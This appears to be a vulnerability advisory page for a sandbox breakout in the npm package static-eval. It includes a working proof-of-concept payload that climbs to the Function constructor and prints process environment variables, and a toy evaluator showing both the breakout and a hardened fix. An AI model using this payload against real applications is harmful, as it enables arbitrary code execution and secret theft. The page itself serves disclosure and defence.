Ecosyste.ms: Advisories

An open API service providing security vulnerability metadata for many open source software ecosystems.

Security Advisories: MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLXg5aGMtcnczNS1mNDRo

Sandbox Breakout / Arbitrary Code Execution in static-eval

Versions of static-eval prior to 2.0.2 let an evaluated expression reach the global Function constructor (for example through the `.constructor` property of any function value) and pass untrusted input to it, so a string embedded in the expression is compiled and executed as arbitrary code when user input is parsed and evaluated via the package.

Proof of concept

// Proof of concept as published in the advisory. Requires a vulnerable
// static-eval (<= 2.0.1) and esprima to be installed.
var evaluate = require('static-eval');
var parse = require('esprima').parse;

// `"".sub` is an ordinary function value (String.prototype.sub); its
// `.constructor` is the global Function constructor, so the string argument
// is compiled into a function, which the trailing `()` then invokes.
// The expression therefore runs arbitrary code regardless of the vars object.
var payload = '(function({x}){return x.constructor})({x:"".sub})("console.log(process.env)")()';
var ast = parse(payload).body[0].expression;
console.log(evaluate(ast, {x:1}));
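The mechanism behind the proof of concept, as an added example that is not code from static-eval or from the advisory: a miniature expression evaluator in the same style (walking an ESTree-shaped AST, here built by hand so no parser is needed). Its naive MemberExpression handler resolves properties on the live JavaScript object graph, so `fn.constructor` on any function value yields `Function` and the string argument is compiled and run. The hardened variant refuses the prototype-climbing property names after the property name has been resolved (so the computed form `fn["constr" + "uctor"]` is caught too) and additionally refuses to invoke any of the Function constructors however they were reached. All node builders, variable names and the `BLOCKED_PROPS`/`FUNCTION_CTORS` sets are this example's own, not static-eval's fix.

```javascript
'use strict';

// Added example (not static-eval code): a toy evaluator in the static-eval
// style, with a naive and a hardened MemberExpression/CallExpression handler.

const FAIL = Symbol('FAIL');

// Property names that climb from any value toward Function / Object.prototype.
const BLOCKED_PROPS = new Set(['constructor', '__proto__', 'prototype']);

// Every flavour of Function constructor; handing the expression any of these
// is a sandbox breakout.
const FUNCTION_CTORS = new Set([
  Function,
  Object.getPrototypeOf(function* () {}).constructor,       // GeneratorFunction
  Object.getPrototypeOf(async function () {}).constructor,  // AsyncFunction
  Object.getPrototypeOf(async function* () {}).constructor, // AsyncGeneratorFunction
]);

function makeEvaluator(hardened) {
  // Resolve a MemberExpression, returning both the object (for `this`) and
  // the property value. The check runs on the *resolved* property name, so a
  // computed property such as `fn["constr" + "uctor"]` cannot slip past it.
  function memberOf(node, vars) {
    const obj = walk(node.object, vars);
    if (obj === FAIL || obj == null) return FAIL;
    const prop = node.computed ? walk(node.property, vars) : node.property.name;
    if (prop === FAIL) return FAIL;
    if (hardened && BLOCKED_PROPS.has(String(prop))) return FAIL;
    return { obj, value: obj[prop] };
  }

  function walk(node, vars) {
    switch (node.type) {
      case 'Literal':
        return node.value;
      case 'Identifier':
        return Object.prototype.hasOwnProperty.call(vars, node.name) ? vars[node.name] : FAIL;
      case 'BinaryExpression': {
        const l = walk(node.left, vars);
        const r = walk(node.right, vars);
        if (l === FAIL || r === FAIL || node.operator !== '+') return FAIL;
        return l + r;
      }
      case 'MemberExpression': {
        const m = memberOf(node, vars);
        return m === FAIL ? FAIL : m.value;
      }
      case 'CallExpression': {
        let thisArg;
        let callee;
        if (node.callee.type === 'MemberExpression') {
          const m = memberOf(node.callee, vars);
          if (m === FAIL) return FAIL;
          thisArg = m.obj;
          callee = m.value;
        } else {
          callee = walk(node.callee, vars);
        }
        if (callee === FAIL || typeof callee !== 'function') return FAIL;
        // Second line of defence: even if a Function constructor arrived via
        // the vars object or a path the property filter missed, never call it.
        if (hardened && FUNCTION_CTORS.has(callee)) return FAIL;
        const args = [];
        for (const a of node.arguments) {
          const v = walk(a, vars);
          if (v === FAIL) return FAIL;
          args.push(v);
        }
        return callee.apply(thisArg, args);
      }
      default:
        return FAIL; // anything not whitelisted is rejected
    }
  }
  return walk;
}

// Tiny ESTree builders so the ASTs below can be constructed without a parser.
const lit = (value) => ({ type: 'Literal', value });
const id = (name) => ({ type: 'Identifier', name });
const mem = (object, name) => ({ type: 'MemberExpression', object, property: id(name), computed: false });
const cmem = (object, property) => ({ type: 'MemberExpression', object, property, computed: true });
const call = (callee, args) => ({ type: 'CallExpression', callee, arguments: args });
const plus = (left, right) => ({ type: 'BinaryExpression', operator: '+', left, right });

const evaluateNaive = makeEvaluator(false);
const evaluateHardened = makeEvaluator(true);

// Constructed inputs. `fn` plays the role of `"".sub` in the advisory's PoC:
// any function value whose .constructor is the global Function constructor.
const vars = { s: 'hi', fn: ''.sub };
const breakout = call(call(mem(id('fn'), 'constructor'), [lit('return 6 * 7')]), []);
const breakoutComputed = call(call(cmem(id('fn'), plus(lit('constr'), lit('uctor'))), [lit('return 6 * 7')]), []);
const benign = call(mem(id('s'), 'toUpperCase'), []);

function demo() {
  return {
    naiveBreakout: evaluateNaive(breakout, vars),             // 42: the string was compiled and run
    naiveComputed: evaluateNaive(breakoutComputed, vars),     // 42 again via the computed property
    hardenedBreakout: evaluateHardened(breakout, vars),       // FAIL
    hardenedComputed: evaluateHardened(breakoutComputed, vars), // FAIL
    hardenedBenign: evaluateHardened(benign, vars),           // 'HI': ordinary member calls still work
  };
}

console.log(demo());
```

The `return 6 * 7` body stands in for the advisory's `console.log(process.env)`; once an expression can call `Function`, the body is attacker-chosen. Note that a name-based filter alone is not a complete sandbox: it must be applied after the property name is evaluated, and the callee check on the Function constructors catches values that reach the expression by other routes (a permissive vars object, `Object.getPrototypeOf`, and so on).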

Recommendation

Upgrade to version 2.0.2 or later.

Permalink: https://github.com/advisories/GHSA-x9hc-rw35-f44h
JSON: https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLXg5aGMtcnczNS1mNDRo
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: over 3 years ago
Updated: over 1 year ago


CVSS Score: 7.3
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Identifiers: GHSA-x9hc-rw35-f44h
References:
Blast Radius: 37.4

Affected Packages

npm:static-eval
Dependent packages: 109
Dependent repositories: 132,071
Downloads: 14,120,948 last month
Affected Version Ranges: <= 2.0.1
Fixed in: 2.0.2
All affected versions: 0.0.0, 0.1.0, 0.1.1, 0.2.0, 0.2.1, 0.2.2, 0.2.3, 0.2.4, 1.0.0, 1.1.0, 1.1.1, 2.0.0, 2.0.1
All unaffected versions: 2.0.2, 2.0.3, 2.0.4, 2.0.5, 2.1.0, 2.1.1